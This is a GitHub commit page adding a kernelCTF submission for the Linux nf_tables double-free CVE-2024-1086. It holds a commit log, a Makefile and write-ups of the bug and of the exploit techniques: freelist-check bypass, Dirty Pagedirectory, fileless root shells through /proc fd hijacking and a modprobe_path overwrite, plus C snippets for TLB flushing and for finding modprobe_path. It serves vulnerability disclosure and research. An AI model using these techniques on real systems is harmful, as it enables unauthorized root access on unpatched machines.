kernelCTF: added CVE-2024-1086 lts mitigation (#96)
* kernelCTF: added CVE-2024-1086 lts mitigation

* fix: musl-tools added

* fix: trying apt update to fix include issue?

* fix: tred fixing includes replacing musl-gcc with gcc. stability concerns?

* fix: reversed previous commit. invalid AVX512 instructions

* fix: tried including -mno-avx512f

* fix: tried replacing musl-gcc with gcc

* fix: reverse previous -mno-avx512f commit (it does not fix static glibc/ld/etc)

* fix: attempted fix by inversing include dirs, and added debug statements

* fix: added debug statements

* fix: added more debuig

* fix: added header files

* fix: added UAPI header files for lts

* fix: removed debug statements

* CVE-2024-1086: added more info to exploit (still incomplete)

* fix: completed exploit.md

* docs: added abbreviations for diagram

* docs: added references in code snippet

* docs: explained ip struct values in detail

* docs: included link to blogpost

* docs: fixed PUD pagetable layer nr

* docs: improved documentation for dirty pagetable technique

* docs: changed paths to external repo to relative path in repo

* Update novel-techniques.md

* test: kernelctf gcc static compile

* test: added libmnl-dev dependency for header

* fix: added libnftnl headers to dependencies

* test: switched to using apt installed headers

* fix: include header path

* fix: changed include path order

* fix: include with incorrect header paths

* fix: linux header include path

* chore: got rid of header bomb lol

* fix: asm headers

* fix: asm-generic headers (please let this be the last)

* fix: asm headers

* fix: got rid of header nuke

* chore: got rid of header nuke for real this time
Notselwyn authored Sep 12, 2024
1 parent c0eac50 commit d35192a
Showing 39 changed files with 5,870 additions and 0 deletions.
721 changes: 721 additions & 0 deletions pocs/linux/kernelctf/CVE-2024-1086_lts_mitigation/docs/exploit.md

Large diffs are not rendered by default.

@@ -0,0 +1,203 @@
# novel-techniques

## Bypassing KernelCTF mitigation instance corruption checks for skb's

One of the mitigations in the KernelCTF Mitigation instance is checking the freelist next pointer when allocating an object through a freelist pointer.

In the exploit, the following happens when doing the double-free:
1. alloc skb1
2. free skb1 (set new freelist pointer)
3. modify skb->len (overlapping with freelist next pointer)
4. free skb1 (set new freelist pointer)

This means that at step 3 the freelist next pointer gets corrupted (`CONFIG_SLAB_FREELIST_HARDENED` is left out of the picture here for demonstration purposes). When background applications on the system transmit packets, they will inevitably allocate the skb object with the corrupted freelist next pointer, causing a system crash.

To bypass this, we leverage the fact that these corruption checks only happen on allocation, not on free. We can therefore mask the corrupted object by spraying "healthy" objects which get allocated instead. The sequence then looks like this:

1. alloc N skb objects
2. alloc skb1
3. free skb1 (set new freelist pointer)
4. modify skb->len (overlapping with freelist next pointer)
5. free N skb objects
6. free skb1 (set new freelist pointer)

Whilst this is probably not the kind of vulnerability which freelist next pointer corruption detection is intended to mitigate, it would definitely mitigate exploitation of this specific scenario.

The fix for this technique would be checking the freelist next pointer of the previous object in the freelist when freeing an object.
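
The masking sequence above can be illustrated with a toy userland model. This is only a sketch under stated assumptions: `pool`, `toy_alloc()`, `toy_free()` and `run_sequence()` are hypothetical names, the freelist is a plain LIFO list, and the "mitigation" is reduced to a next-pointer sanity check on allocation. It is not kernel code.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Toy userland model of a LIFO slab freelist; NOT kernel code. */
#define POOL_SIZE 64

struct obj {
    struct obj *next; /* freelist next pointer, overlaps the object data */
};

static struct obj pool[POOL_SIZE];
static struct obj *freelist_head;

/* A next pointer is "healthy" if it is NULL or points into the pool. */
static bool next_ptr_ok(const struct obj *p)
{
    uintptr_t a = (uintptr_t)p;

    return p == NULL ||
           (a >= (uintptr_t)&pool[0] && a <= (uintptr_t)&pool[POOL_SIZE - 1]);
}

/* Free: nothing is validated here (checks only happen on allocation). */
static void toy_free(struct obj *o)
{
    o->next = freelist_head;
    freelist_head = o;
}

/* Alloc: sets *corrupt when the next-pointer check fires. */
static struct obj *toy_alloc(bool *corrupt)
{
    struct obj *o = freelist_head;

    if (o == NULL)
        return NULL;
    if (!next_ptr_ok(o->next)) {
        *corrupt = true; /* the real mitigation would crash the system here */
        return NULL;
    }
    freelist_head = o->next;
    return o;
}

/*
 * Runs the double-free sequence with n_mask healthy objects and n_background
 * allocations by "other applications" before the second free.
 * Returns true if the corruption check fired.
 */
static bool run_sequence(size_t n_mask, size_t n_background)
{
    struct obj *mask[POOL_SIZE];
    struct obj *skb1;
    bool corrupt = false;
    size_t i;

    if (n_mask > POOL_SIZE - 1)
        n_mask = POOL_SIZE - 1; /* leave room for skb1 */

    freelist_head = NULL; /* fresh freelist containing every pool object */
    for (i = 0; i < POOL_SIZE; i++)
        toy_free(&pool[i]);

    for (i = 0; i < n_mask; i++)             /* 1. alloc N objects */
        mask[i] = toy_alloc(&corrupt);
    skb1 = toy_alloc(&corrupt);              /* 2. alloc skb1 */
    toy_free(skb1);                          /* 3. free skb1 */
    skb1->next = (struct obj *)(uintptr_t)1; /* 4. "skb->len" clobbers next */
    for (i = 0; i < n_mask; i++)             /* 5. free N objects */
        toy_free(mask[i]);
    for (i = 0; i < n_background; i++)       /* background traffic */
        toy_alloc(&corrupt);
    toy_free(skb1);                          /* 6. second free of skb1 */

    return corrupt;
}
```

In this model `run_sequence(0, 1)` trips the check on the first background allocation, while `run_sequence(8, 8)` does not: the eight healthy objects absorb the background allocations, and the second free rewrites the corrupted next pointer before it is ever inspected.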


## Dirty Pagedirectory (pagetable confusion)

Perhaps the most interesting technique in this exploit is Dirty Pagedirectory: plainly put, pagetable confusion between pagetables like PUD+PMD and PMD+PTE.

By overlapping a PUD page and a PMD page (PUD+PMD), or a PMD page and a PTE page (PMD+PTE), we can set pagetable entries from userland pages. This is a *very* powerful primitive, allowing the exploit to do rapid memory reads/writes across all physical memory of the system.

> Note: it does **not** make use of recursion, as (in case of PUD+PMD) the PMD is not the child of the overlapped PUD, but is the child of a normal, arbitrary PUD.

Note that PT entries include not only the physical address (PFN), but also the page flags. Hence, we can write to read-only pages such as the one containing `modprobe_path`. As if that isn't enough, the target area can cover 1GiB (PMD+PTE) and/or 512GiB (PUD+PMD) of addresses at the same time. Of course, this can be limited to save memory usage and overhead.

In the blogpost, this diagram tries to describe it:

![Dirty Pagedirectory diagram showing the relations between different pagetable layers in an exploit](https://pwning.tech/content/images/2024/03/dirtypagedirectory.svg)
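
To make the "PFN plus flags" point concrete, here is a minimal sketch of how a pagetable entry value can be composed on x86-64 with 4-level paging. The bit positions are architectural, but `make_pte()` and the `*_page_span()` helpers are hypothetical names used for illustration, and the chosen flag combination is an assumption rather than the exact value the exploit writes.

```c
#include <stdint.h>

/* x86-64 4-level paging constants (architectural bit positions). */
#define PAGE_SHIFT       12
#define ENTRIES_PER_PAGE 512ULL
#define PTE_PRESENT      (1ULL << 0)
#define PTE_RW           (1ULL << 1)
#define PTE_USER         (1ULL << 2)
#define PTE_NX           (1ULL << 63)
#define PTE_PFN_MASK     0x000ffffffffff000ULL /* physical address bits 12..51 */

/*
 * Hypothetical helper: build an entry that maps phys_addr as a present,
 * writable, user-accessible, non-executable 4KiB page. The flags are set
 * by whoever writes the entry, regardless of how the kernel maps the page.
 */
static uint64_t make_pte(uint64_t phys_addr)
{
    return (phys_addr & PTE_PFN_MASK) | PTE_PRESENT | PTE_RW | PTE_USER | PTE_NX;
}

/* Bytes of address space covered by one full pagetable page per level. */
static uint64_t pte_page_span(void) { return ENTRIES_PER_PAGE << PAGE_SHIFT; }     /* 2MiB   */
static uint64_t pmd_page_span(void) { return ENTRIES_PER_PAGE * pte_page_span(); } /* 1GiB   */
static uint64_t pud_page_span(void) { return ENTRIES_PER_PAGE * pmd_page_span(); } /* 512GiB */
```

The span helpers show where the 1GiB and 512GiB figures come from: each pagetable page holds 512 entries, so every level up multiplies the covered range by 512.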


## Freeing skb's instantly on arbitrary CPUs without UDP/TCP stacks

In order to bypass certain double-free detections, we need to free skb's at specific times on specific CPUs. Additionally, we cannot make use of the UDP and TCP stacks in the kernel, since they access fields in the skb which are corrupted by the double-free.

Fortunately, we can do this with the IPv4 fragment queues (IFQs). By sending an IPv4 fragment to localhost, we make the skb wait in an IFQ; after `ipfrag_time` seconds, all fragments in the queue are freed. Alternatively, the fragments get freed when the IFQ is completed (i.e. the target length is reached with the fragments in the IFQ).

If needed, we can prolong the lifetime of the IFQ by writing to `/proc/sys/net/ipv4/ipfrag_time`.
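
As a rough sketch of prolonging the IFQ lifetime, the helper below writes a decimal value to a sysctl file. `write_int_to_file()` is a hypothetical helper name, not a function from the exploit sources, and the caller is assumed to have permission to write the file in its network namespace.

```c
#include <stdio.h>

/*
 * Hypothetical helper: write a decimal integer followed by a newline to a
 * procfs/sysctl file. Returns 0 on success and -1 on failure.
 */
static int write_int_to_file(const char *path, int value)
{
    FILE *f = fopen(path, "w");

    if (f == NULL)
        return -1;
    if (fprintf(f, "%d\n", value) < 0) {
        fclose(f);
        return -1;
    }
    /* fclose() flushes the buffer, so a failed write is reported here */
    return fclose(f) == 0 ? 0 : -1;
}
```

For example, `write_int_to_file("/proc/sys/net/ipv4/ipfrag_time", 9999)` would keep incomplete fragment queues around for 9999 seconds; the value is only an illustration.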

Unfortunately, the target length of the IFQ depends on skb->len, which is corrupted by the double-free. Hence, instead of completing the queue, we trigger an error in the IFQ code, causing it to free all fragments in the queue on the CPU handling the triggering skb.

It looks like this in action with the double-free:
1. alloc skb1 (double-freed IPv4 fragment) @ CPU `X`
2. free skb1 (1) @ CPU `X`
3. make skb1 go into IFQ (utilizing its content)
4. do stuff here, like spraying skb's, spraying PTEs, etc
5. alloc skb2 (erroneous IPv4 fragment) @ CPU `Y`
6. free skb2 @ CPU `Y`
7. free skb1 @ CPU `Y`

## Fileless privesc using fd hijacking

We can escape the namespace by doing file descriptor hijacking: hooking up the file descriptors of another process (or `/dev/console`) to the `/bin/sh` instance as root triggered by the `modprobe_path` technique.

For example:
- hijack `/dev/console` (works only on local TTYs): `/bin/sh 0</dev/console 1>/dev/console 2>&1`
- hijack exploit fd's (works on reverse shells as well): `/bin/sh 0</proc/<exploit_pid>/fd/0 1>/proc/<exploit_pid>/fd/1 2>&1`

This way we can do fileless privesc and escape the namespace without even writing a single file, allowing for privesc on read-only systems.
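
A minimal sketch of generating the second one-liner for a given process: `build_hijack_script()` is a hypothetical helper that only formats the script text, using the redirections listed above with the PID filled in.

```c
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

/*
 * Hypothetical helper: format a shell script which attaches a new /bin/sh
 * to the stdin/stdout of process `pid` through procfs.
 * Returns the script length, or -1 if buf is too small.
 */
static int build_hijack_script(char *buf, size_t buflen, pid_t pid)
{
    int n = snprintf(buf, buflen,
                     "#!/bin/sh\n/bin/sh 0</proc/%d/fd/0 1>/proc/%d/fd/1 2>&1\n",
                     (int)pid, (int)pid);

    return (n < 0 || (size_t)n >= buflen) ? -1 : n;
}
```

Calling it with `getpid()` from the exploit process yields a script whose shell talks over the exploit's own stdio, which is why this variant also works over a reverse shell.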

## Fileless privesc using modprobe_path + procfs

We can combine overwriting `modprobe_path` with procfs to allow for fileless privesc script execution as root from the root namespace. With this primitive, we can utilize fd hijacking to perform fileless namespace escapes.

We can overwrite `modprobe_path` to `/proc/<exploit_pid>/fd/<privesc_script_fd>` and it will execute the privesc script completely from memory, allowing privesc on read-only systems.
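
One way to obtain such an in-memory script fd is sketched below. Using `memfd_create` (invoked through `syscall()` here) is an assumption for illustration, and `stage_script_in_memory()` is a hypothetical helper name; the source only states that the script is executed from memory through a procfs fd path.

```c
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Hypothetical helper: store `script` in an anonymous in-memory file and
 * format the procfs path referring to it ("/proc/<pid>/fd/<fd>").
 * Returns the fd (which must stay open), or -1 on error.
 */
static int stage_script_in_memory(const char *script, char *path, size_t pathlen)
{
    size_t len = strlen(script);
    int fd = (int)syscall(SYS_memfd_create, "privesc", 0U);
    int n;

    if (fd < 0)
        return -1;

    if (write(fd, script, len) != (ssize_t)len) {
        close(fd);
        return -1;
    }

    n = snprintf(path, pathlen, "/proc/%d/fd/%d", (int)getpid(), fd);
    if (n < 0 || (size_t)n >= pathlen) {
        close(fd);
        return -1;
    }

    return fd;
}
```

The resulting path is what would be written over `modprobe_path`. The fd has to remain open in the exploit process for as long as the kernel may resolve that path.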

## TLB flushing with PCID enabled

One of the things required for Dirty Pagedirectory is a working TLB flushing primitive. Assuming the target VMA is shared, we can fork() and munmap() that VMA in the child. This allows for 100% working TLB flushing regardless of PCID, without altering the original pagetables. I presume the process needs to be pinned to a CPU, to avoid flushing the TLB of the wrong CPU core.

The code for this looks like:

```c
#define SPINLOCK(cmp) while (cmp) { usleep(10 * 1000); }

// presumably needs to be CPU pinned
static void flush_tlb(void *addr, size_t len)
{
    short *status;

    // shared anonymous mapping, so the child's status write is visible to the parent
    status = mmap(NULL, sizeof(short), PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);

    *status = FLUSH_STAT_INPROGRESS;
    if (fork() == 0)
    {
        // unmapping the shared VMA in the child is what triggers the TLB flush
        munmap(addr, len);
        *status = FLUSH_STAT_DONE;
        sleep(9999);
    }

    // wait until the child reports that it has unmapped the VMA
    SPINLOCK(*status == FLUSH_STAT_INPROGRESS);

    munmap(status, sizeof(short));
}
```

Note that the child sleeps instead of exiting, to avoid certain kernel bugs when doing Dirty Pagedirectory.

## Easing physical KASLR bruteforce

It is possible to ease physical KASLR bruteforcing. The Linux kernel base is aligned to `CONFIG_PHYSICAL_START` (and/or `CONFIG_PHYSICAL_ALIGN`) bytes. This essentially means the Linux kernel must be aligned to 16MiB or 2MiB, reducing the number of possible base addresses from one per byte of physical memory (e.g. 8GiB of addresses, assuming 8GiB physical memory) to 512 addresses with 16MiB alignment, or 4096 with 2MiB alignment (a bruteforceable amount).
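
The arithmetic behind those numbers can be sketched as follows. `kaslr_candidates()` and `kaslr_candidate()` are hypothetical helper names, and the memory size and alignment are inputs the caller has to know or guess.

```c
#include <stdint.h>

#define MIB (1024ULL * 1024ULL)
#define GIB (1024ULL * MIB)

/* Number of aligned physical addresses at which the kernel base could sit. */
static uint64_t kaslr_candidates(uint64_t phys_mem_bytes, uint64_t align_bytes)
{
    return phys_mem_bytes / align_bytes;
}

/* The i-th candidate kernel base address for a given alignment. */
static uint64_t kaslr_candidate(uint64_t i, uint64_t align_bytes)
{
    return i * align_bytes;
}
```

With 8GiB of physical memory, `kaslr_candidates(8 * GIB, 16 * MIB)` gives 512 and `kaslr_candidates(8 * GIB, 2 * MIB)` gives 4096, so a bruteforce loop only has to visit `kaslr_candidate(i, align)` for each `i` below that count.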

## Validating the correct modprobe_path

We can validate whether we found the correct `modprobe_path` object in physical memory (when using Dirty Pagedirectory) by checking if the output of `/proc/sys/kernel/modprobe` has changed to the new value, since it is a "real-time" reference to the `modprobe_path` object used in the kernel.

For example, this can be done with:

```c
// read_file() and KMOD_PATH_LEN are defined elsewhere in the exploit sources
static int get_modprobe_path(char *buf, size_t buflen)
{
    int size;

    size = read_file("/proc/sys/kernel/modprobe", buf, buflen);

    // nothing was read: avoid writing to buf[-1] below
    if (size <= 0)
        return size;

    if ((size_t)size == buflen)
        printf("[*] ==== read max amount of modprobe_path bytes, perhaps increment KMOD_PATH_LEN? ====\n");

    // remove \x0a
    buf[size-1] = '\x00';

    return size;
}

static int strcmp_modprobe_path(char *new_str)
{
    char buf[KMOD_PATH_LEN] = { '\x00' };

    get_modprobe_path(buf, KMOD_PATH_LEN);

    return strncmp(new_str, buf, KMOD_PATH_LEN);
}

void *memmem_modprobe_path(void *haystack_virt, size_t haystack_len, char *modprobe_path_str, size_t modprobe_path_len)
{
    void *pmd_modprobe_addr;

    // search the haystack (0x200000 bytes, the span of a full PTE page, at a time) for the modprobe_path signature
    pmd_modprobe_addr = memmem(haystack_virt, haystack_len, modprobe_path_str, modprobe_path_len);
    if (pmd_modprobe_addr == NULL)
        return NULL;

    // check if this is the actual modprobe by overwriting it, and checking /proc/sys/kernel/modprobe
    strcpy(pmd_modprobe_addr, "/sanitycheck");
    if (strcmp_modprobe_path("/sanitycheck") != 0)
    {
        printf("[-] ^false positive. skipping to next one\n");
        return NULL;
    }

    return pmd_modprobe_addr;
}
```

## Page refcount juggling

When freeing a page, the Linux kernel drops a reference and checks if the page's refcount has reached 0. If it has not, it will refuse to free the page. To bypass this behaviour we simply juggle the refcounts, by utilizing the following order of operations for the double-free:

1. alloc obj1 | refcount 0 -> 1
2. free obj1 | refcount 1 -> 0
3. alloc obj2 | refcount 0 -> 1
4. free obj1 | refcount 1 -> 0
5. alloc obj3 | refcount 0 -> 1

obj2 and obj3 will now be overlapping (backed by the same page), because the refcount always dropped to 0 when freeing.

```c
void __free_pages(struct page *page, unsigned int order)
{
    /* get PageHead before we drop reference */
    int head = PageHead(page);

    if (put_page_testzero(page))
        free_the_page(page, order);
    else if (!head)
        while (order-- > 0)
            free_the_page(page + (1 << order), order);
}
```

## Double-free order 4 to order 0 (old: race condition)

When double-freeing pages, we can convert the page order to 0 utilizing a race condition with a `WARN()` message on really slow systems (like QEMU VMs with synchronous terminals). In the new exploit, this has been replaced with PCP draining as this works on all systems.

This allows us to double-allocate `order==0` pages whilst having a double-free primitive on `order==4` pages.

## Double-free order X to order Y (new: PCP refill)

When double-freeing pages, we can convert the page order to an arbitrary order by double-freeing pages with `order>=4` such that it will end up in the buddy allocator freelist. Then, we can allocate it to the PCP list of an arbitrary `order<=3` page freelist, by draining said PCP-freelist and refilling it with the pages from the buddy-freelist.

This is the new variant of the race condition-based method.
@@ -0,0 +1,47 @@
# vulnerability

Document containing information about the vulnerability, the requirements, and the affected Linux kernel versions.

## technical details

### outlines

The root cause is an input sanitization bug in `nft_verdict_init()` (`net/netfilter/nf_tables_api.c:9814`), which allowed rule verdicts to return positive drop errors. This is classified as CVE-2024-1086.

The impact of this is a stable double-free primitive on both `struct sk_buff` objects and `sk_buff->head` objects (kmalloc objects, ranging from size 256 to 65536 (assuming ipv4) a.k.a. order 4 buddy pages).

The fix for the vulnerability was simply disallowing all drop errors in `nft_verdict_init()`, so that userland applications can no longer provide any drop errors. It did not make sense to the kernel developers that userland applications could do this in the first place, hence they fully disabled it.

### triggering the bug

An exploit can create a rule containing an expression which sets the verdict to `0xFFFF0000`.

When this rule gets evaluated for an skb passing the nf_tables firewall, `nf_hook_slow()` attempts to free an skb object because `NF_DROP` is returned from the verdict mask of the rule verdict (`0xFFFF0000 (verdict) & 0x000000ff (NF_VERDICT_MASK) == 0 (NF_DROP)`). Then, `nf_hook_slow()` returns `NF_ACCEPT` (`NF_DROP_GETERR(0xFFFF0000) == NF_ACCEPT`) as if every hook/rule in the chain returned `NF_ACCEPT`.

This causes the caller of `nf_hook_slow()` to misinterpret the situation (it believes the packet has not been freed, and should be handled), and continue parsing the packet and eventually double-free both the skb object and its skb->head object.
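
The verdict arithmetic can be checked with a small userland sketch. The constants match the kernel's netfilter headers, while `verdict_action()` and `drop_geterr()` are hypothetical re-implementations written for illustration. In particular, `drop_geterr()` assumes the kernel treats the verdict as a signed 32-bit integer and uses an arithmetic right shift, which is emulated portably here.

```c
#include <stdint.h>

/* Values as defined in the kernel's netfilter headers. */
#define NF_DROP          0
#define NF_ACCEPT        1
#define NF_VERDICT_MASK  0x000000ffU
#define NF_VERDICT_QBITS 16

/* The action nf_hook_slow() switches on: the low byte of the verdict. */
static unsigned int verdict_action(uint32_t verdict)
{
    return verdict & NF_VERDICT_MASK;
}

/*
 * Hypothetical userland equivalent of NF_DROP_GETERR(): negate the upper
 * 16 bits of the verdict, interpreted as a signed value (assumption: this
 * mirrors an arithmetic shift of a signed 32-bit verdict in the kernel).
 */
static int drop_geterr(uint32_t verdict)
{
    int32_t err = (int32_t)(verdict >> NF_VERDICT_QBITS);

    if (err >= 0x8000)
        err -= 0x10000; /* sign-extend the 16-bit drop error */

    return -err;
}
```

Under these assumptions `verdict_action(0xFFFF0000)` is `NF_DROP`, so the skb is freed, while `drop_geterr(0xFFFF0000)` is `1`, which the caller reads as `NF_ACCEPT`. A regular drop error such as `0x00010000` yields `-1` instead, a negative errno value.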

## requirements

Capabilities:
- `CAP_NET_ADMIN`

Kernel configuration:
- `CONFIG_NF_TABLES=y`
- `CONFIG_NETFILTER=y`

User namespaces needed:
- Yes, in order to set up rules for nf_tables to trigger the bug (`CAP_NET_ADMIN` in the current namespace should also be enough)

## version info

Commit which introduced the vuln:
- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e0abdadcc6e113ed2e22c85b35007

Commit which fixed the vuln (revert of previous commit):
- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f342de4e2f33e0e39165d8639387aa6c19dff660

Affected kernel versions:
- everything between `v3.5` and `v6.8-rc1`
- excluding `v6.1.76` and higher on `v6.1.x`
- excluding `v6.6.15` and higher on `v6.6.x`
- excluding `v6.7.3` and higher on `v6.7.x`
@@ -0,0 +1,42 @@
SRC_FILES := src/exploit.c src/env.c src/net.c src/nftnl.c src/file.c
OUT_NAME = ./exploit

# use musl-gcc since statically linking glibc with gcc generated invalid opcodes for qemu
# and dynamically linking raised glibc ABI versioning errors
CC = musl-gcc

CFLAGS = -I./include -Wall -Wno-deprecated-declarations

# use custom object archives compiled with musl-gcc for compatibility. normal ones
# are used with gcc and have _chk funcs which musl doesn't support
# - ./include/libmnl: libmnl v1.0.5
# - ./include/libnftnl: libnftnl v1.2.6
LIBMNL_PATH = ./lib/libmnl.a
LIBNFTNL_PATH = ./lib/libnftnl.a

exploit: _compile_static _strip_bin
prerequisites: _install_musl _install_headers
run: _run_outfile
clean: _clean_outfile

_install_headers:
	sudo apt-get install libmnl-dev libnftnl-dev

	# incredibly cursed way to manage musl-gcc include paths (by doing -I/usr/include I got errors like <bits/wordsize.h> not being found)
	mkdir include
	ln -s /usr/include/libnftnl ./include/libnftnl
	ln -s /usr/include/libmnl ./include/libmnl
	ln -s /usr/include/linux ./include/linux
	ln -s /usr/include/x86_64-linux-gnu/asm ./include/asm
	ln -s /usr/include/asm-generic ./include/asm-generic

_install_musl:
	sudo apt-get install musl-tools

_compile_static:
	$(CC) $(CFLAGS) $(SRC_FILES) -o $(OUT_NAME) -static $(LIBNFTNL_PATH) $(LIBMNL_PATH)

_strip_bin:
	strip $(OUT_NAME)

_run_outfile:
	$(OUT_NAME)

_clean_outfile:
	rm $(OUT_NAME)
Binary file not shown.